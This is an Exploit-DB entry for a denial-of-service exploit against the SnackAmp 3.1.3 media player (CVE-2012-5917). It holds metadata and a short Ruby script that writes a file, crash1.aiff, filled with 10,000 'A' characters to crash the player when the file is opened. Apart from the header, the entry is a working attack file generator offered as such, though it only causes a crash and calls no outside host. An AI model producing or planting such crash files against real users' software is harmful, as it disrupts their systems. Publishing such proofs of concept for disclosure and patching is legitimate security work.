SnackAmp 3.1.3 - '.aiff' Denial of Service

Author: Ahmed Elhady Mohamed
type: dos
platform: linux
port: 
date_added: 2012-04-01  
date_updated: 2012-04-01  
verified: 0  
codes: OSVDB-80805;CVE-2012-5917  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comsnackAmp-3.1.3.i386.tar.gz  

raw file: 18692.rb  
SnackAmp 3.1.3 Malicious aiff File Denial of service
===================================================================================
# Exploit Title:SnackAmp 3.1.3 Malicious aiff File Denial of service
# Download link :http://sourceforge.net/projects/snackamp/
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 3.1.3
# Category: DOS
# Tested on: ubuntu 11.4
===================================================================================

File.open "crash1.aiff" , "w" do |file|

buffer = "A" * 10000

file.puts buffer
end